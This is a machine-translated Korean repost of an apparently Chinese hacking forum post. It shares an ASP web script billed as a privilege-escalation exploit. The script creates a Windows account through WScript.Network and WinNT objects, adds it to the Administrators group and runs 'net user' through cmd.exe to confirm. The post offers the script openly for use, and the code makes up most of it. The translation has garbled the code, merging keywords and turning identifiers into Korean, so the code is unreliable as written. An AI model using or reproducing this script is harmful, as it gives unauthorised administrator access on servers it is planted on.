Super User 's .asp 코드 추가 [블루 스크린의 원본, Kevin 개선, MS 미공개 취약성]
저자 : 블루 스크린, Kevin의 기사 출처 : Freezing Point Extreme
사실, Kevin과 나는 지난주에 육계와 Hippo Epic에서 그것을 테스트했습니다. 결과적으로 관리자 그룹의 사용자는 사용자 권한에 따라 성공적으로 추가되었습니다 (내 눈을 믿을 수는 없지만).
마지막으로 Kevin이 아무 말도하지 않았을 때, 나는 그것을 게시하지 않았다 ... 이제 나는 그가 그의 블로그에 그것을 게시하는 것을 보았 기 때문에 그것을 전송했다 (지난번에 테스트했을 때보 다 조금 더 좋았고 양식을 추가했다). 이제 나는 모두에게 운이 좋다.```
어쨌든, 코드는 정확하지만 거의 성공하지 못하며 행운에 따라 다릅니다. . 하하, 다음 단계 나는 그를 바다에 통합하고 싶습니다. 이봐.
코드 사본은 다음과 같습니다.
<head> .network 객체 객체 스크립트 권한 강화 Exploit 도구 </head>
<formaction = "userAdd.asp"메소드 = post>
사용자 : <inputname = "username"type = "text"value = "kevin1986"> <br>
비밀번호 : <inputname = "passwd"type = "password"> <br>
<inputtype = "제출"value = "add">
</form>
<%@codepage = 936
onerrorresumenext
ifrequest.servariables ( "remote_addr") <> "127.0.0.1"
Response.write "IP! SN0Tright"
또 다른
ifrequest ( "username") <> ""그런 다음
username = request ( "사용자 이름")
passwd = 요청 ( "passwd")
응답 .expires = 0
session.timeout = 50
Server.ScriptTimeout = 3000
setlp = server.createobject ( "wscript.network")
oz = "winnt : //"& lp.computername
setob = getObject (OZ)
setoe = getObject (oz & "/관리자, 그룹")
setod = ob.create ( "사용자", 사용자 이름)
OD.SetPasswordPasswd
Od.setInfo
oe.addoz & "/"& username
iferrthen
응답. "이봐 ~~ 오늘 6+1을 사지 않아야합니다.
또 다른
ifinstr (server.createobject ( "wscript.shell"). exec ( "cmd.exe/cnetuser"& username.stdout.readall), "last login")> 0then
응답. "오류는 없지만 성공적으로 설정되지 않은 것 같습니다. 매우 우울해야합니다."
또 다른
Response.write "OMG!"& username & "계정은 실제로 알려지지 않은 허점입니다. 5,000,000RMB는 귀하의 것입니다."
endif
endif
또 다른
response.write "사용자 이름을 입력하십시오"
endif
endif
%>